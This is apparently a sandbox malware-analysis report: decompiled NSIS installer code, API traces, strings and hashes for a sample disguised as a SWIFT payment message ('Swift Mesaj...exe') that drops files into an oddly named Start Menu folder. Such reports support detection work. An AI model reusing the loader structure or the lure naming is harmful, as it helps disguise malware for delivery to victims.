							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x434f94 - _t151;
								if( *0x434f94 == _t151) {
									L72:
									_t72 =  *0x434fac;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E0040665C(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058E4( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x434f00 == _t151) {
							L47:
							 *0x434fac =  *0x434fac | 0xffffffff;
							 *(_t197 + 0x14) = E00403990( *0x434fac);
							goto L48;
						}
						_t184 = E00405B80(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E0040584F(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E00405832();
									} else {
										E004057B5();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra" - _t151; // 0x43
									if(_t243 == 0) {
										E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t195);
									}
									E00406282(0x435000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x435800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x120)));
										DeleteFileW(0x42aa08);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Swift Mesaj#U0131#09971.exe", 0x42aa08, 1) != 0) {
											E00406048(_t156, 0x42aa08, _t151);
											E004062A4(_t151, _t172, 0x42aa08, 0x42aa08,  *((intOrPtr*)( *0x434ef4 + 0x124)));
											_t103 = E00405867(0x42aa08);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x435800 =  *0x435800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406048(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C5B(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t185);
							E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Novelizes", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E00403342(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E00403342(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x434fa0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B80(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065EC(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E0040665C(0xa);
					 *0x434ee4 = E0040665C(8);
					_t56 = E0040665C(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x434eef =  *0x434eef | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x0040337e
0x0040337f
0x00403386
0x0040338a
0x00403392
0x00403396
0x004033a2
0x004033ab
0x004033b0
0x004033b3
0x004033ba
0x004033c1
0x004033c1
0x004033ba
0x004033c3
0x004033c3
0x0040340b
0x0040340c
0x00403413
0x00403419
0x0040342f
0x0040343f
0x00403444
0x0040344a
0x00403451
0x00403465
0x0040346a
0x0040346c
0x00403470
0x00403475
0x00403475
0x00403484
0x00403486
0x0040348a
0x00403490
0x004035a7
0x004035ad
0x004035b8
0x004035ba
0x004035bf
0x004035c1
0x00403619
0x0040361e
0x00403628
0x0040362f
0x00403633
0x004036e4
0x004036e4
0x004036e9
0x004036ef
0x004036f4
0x0040381a
0x00403820
0x0040389e
0x0040389e
0x004038a3
0x004038a6
0x004038a8
0x004038a8
0x004038b0
0x004038b0
0x00403830
0x00403836
0x00403838
0x00403845
0x00403858
0x00403860
0x00403868
0x00403868
0x00403870
0x00403875
0x0040387c
0x0040388a
0x0040388d
0x00403893
0x00403895
0x00000000
0x00000000
0x00000000
0x0040387e
0x00403884
0x00403886
0x00403888
0x00403897
0x00403899
0x00000000
0x00403899
0x00000000
0x00403888
0x0040387c
0x00403703
0x0040370a
0x0040370a
0x0040363f
0x004036d4
0x004036d4
0x004036e0
0x00000000
0x004036e0
0x0040364c
0x00403650
0x0040369e
0x0040369e
0x004036a0
0x004036a8
0x0040371b
0x0040371d
0x00403724
0x0040372c
0x0040372c
0x00403737
0x0040373c
0x0040374b
0x0040374f
0x00403750
0x00403759
0x00403752
0x00403752
0x00403752
0x0040375f
0x00403765
0x0040376c
0x00403774
0x00403774
0x00403782
0x0040378e
0x0040379c
0x004037a1
0x004037a7
0x004037b3
0x004037b9
0x004037c3
0x004037d9
0x004037ea
0x004037f0
0x004037f7
0x004037fa
0x00403800
0x00403800
0x004037f7
0x00403804
0x0040380b
0x0040380b
0x00403810
0x00403810
0x00000000
0x0040374b
0x004036aa
0x004036ad
0x004036b8
0x00000000
0x00000000
0x004036c0
0x004036cb
0x004036d0
0x00000000
0x004036d0
0x00403659
0x00403671
0x00403682
0x00403683
0x00403687
0x00403689
0x00403697
0x0040369a
0x00000000
0x00000000
0x00000000
0x0040369a
0x0040369c
0x00000000
0x0040369c
0x004035c9
0x004035d5
0x004035da
0x004035df
0x004035e1
0x00000000
0x00000000
0x004035e9
0x004035f1
0x00403602
0x0040360a
0x0040360c
0x00403611
0x00403613
0x00000000
0x00000000
0x00000000
0x00403496
0x00403496
0x00403498
0x0040349c
0x004034a5
0x004034a9
0x004034ae
0x004034af
0x004034af
0x004034b4
0x00000000
0x004034ba
0x004034bb
0x004034c0
0x004034c2
0x004034ca
0x004034d1
0x004034d1
0x004034ca
0x004034e2
0x004034f5
0x004034f6
0x0040350b
0x00403510
0x00403514
0x0040351d
0x00403525
0x0040352c
0x0040352c
0x00403525
0x00403538
0x0040354b
0x0040354c
0x00403561
0x00403567
0x0040356b
0x00000000
0x00403592
0x00403592
0x00403597
0x004035a0
0x004035a5
0x004035a5
0x00000000
0x004035a5
0x0040356b
0x00000000
0x00000000
0x00000000
0x0040349e
0x0040349e
0x0040349f
0x004034a0
0x00000000
0x00403573
0x0040357a
0x00403580
0x00403583
0x00403583
0x00403584
0x00403587
0x00000000
0x00403590
0x004033c8
0x004033c9
0x004033d5
0x004033dc
0x00000000
0x004033de
0x004033e0
0x004033ee
0x004033f3
0x004033fa
0x004033fe
0x00403402
0x00403404
0x00403404
0x00403402
0x00000000
0x004033fa

APIs

SetErrorMode.KERNELBASE ref: 00403396
GetVersion.KERNEL32 ref: 0040339C
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
OleInitialize.OLE32(00000000), ref: 00403413
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E

Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E

Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
ExitProcess.KERNEL32 ref: 0040370A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
CopyFileW.KERNEL32(C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
OpenProcessToken.ADVAPI32(00000000), ref: 00403830
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
AdjustTokenPrivileges.ADVAPI32 ref: 00403868
ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
ExitProcess.KERNEL32 ref: 004038B0

Strings

\Temp, xrefs: 004035CF
TEMP, xrefs: 004035FD
C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe, xrefs: 004037C8
~nsu, xrefs: 00403715
C:\Users\user\Desktop, xrefs: 0040373C, 00403741, 0040376E
SeShutdownPrivilege, xrefs: 0040383F
Error launching installer, xrefs: 004036A0
UXTHEME, xrefs: 004033C3, 004033C8, 004033CE
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra, xrefs: 0040359B, 004036BB, 00403765, 0040376F
Low, xrefs: 004035EB
TMP, xrefs: 00403605
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes, xrefs: 004036C6
"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe", xrefs: 0040344A, 00403450, 00403646
.tmp, xrefs: 00403731
NSIS Error, xrefs: 00403435
C:\Users\user\AppData\Local\Temp\, xrefs: 004035AD, 004035B2, 004035C8, 004035D4, 004035E3, 004035F0, 004035FC, 00403604, 0040371A, 0040372B, 00403736, 00403742, 0040374F, 0040375E, 0040380F
1033, xrefs: 00403619

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes$C:\Users\user\Desktop$C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-3968257312
Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E

Uniqueness

Uniqueness Score: -1.00%

Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00404C62(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x434f28;
				_t282 = 0;
				_v24 =  *0x434ef4 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x434efd & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404BB0(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x434efc) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42d22c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42d240;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42d22c = _t282;
								 *0x42d240 = _t282;
								 *0x434f60 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x434efd & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C30();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x42d240;
									_t195 =  *0x434f28;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x434f2c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t282) {
											E00404B6B(0x3ff, 0xfffffffb, E00404B83(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x434f2c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42d240);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x434f60 = _t306;
					 *0x42d240 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t252 = LoadBitmapW( *0x434ee0, 0x6e);
					 *0x42d234 =  *0x42d234 | 0xffffffff;
					_t313 = _t252;
					 *0x42d23c = SetWindowLongW(_v8, 0xfffffffc, E0040525A);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d22c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d22c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004062A4(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404217(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404217(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
										 *( *0x42d240 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x42d240 + _t316 * 4) = _t276;
									_t284 =  *( *0x42d240 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x434f2c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040424C(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040424C(_v12);
								L91:
								return E0040427E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c71
0x00404c82
0x00404c87
0x00404c8f
0x00404c95
0x00404c9d
0x00404cab
0x00404cae
0x00404ecf
0x00404ed6
0x00404eea
0x00404ed8
0x00404eda
0x00404edd
0x00404ede
0x00404ee5
0x00404ee5
0x00404ef6
0x00404f04
0x00404f07
0x00404f1d
0x00404f92
0x00404f95
0x00404f97
0x00404fa1
0x00404faf
0x00404faf
0x00404fb1
0x00404fbb
0x00404fc1
0x00404fc4
0x00404fc7
0x00404fe2
0x00404fc9
0x00404fd3
0x00404fd3
0x00404fc7
0x00404fbb
0x00000000
0x00404f95
0x00404f22
0x00404f2d
0x00404f32
0x00404f39
0x00404f3e
0x00404f42
0x00404f4d
0x00404f4d
0x00404f51
0x00404f55
0x00404f59
0x00404f6c
0x00404f5b
0x00404f5b
0x00404f62
0x00404f68
0x00404f64
0x00404f64
0x00404f64
0x00404f62
0x00404f70
0x00404f72
0x00404f85
0x00404f88
0x00404f8b
0x00404f8b
0x00404f55
0x00000000
0x00404f42
0x00404f24
0x00404f2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fe5
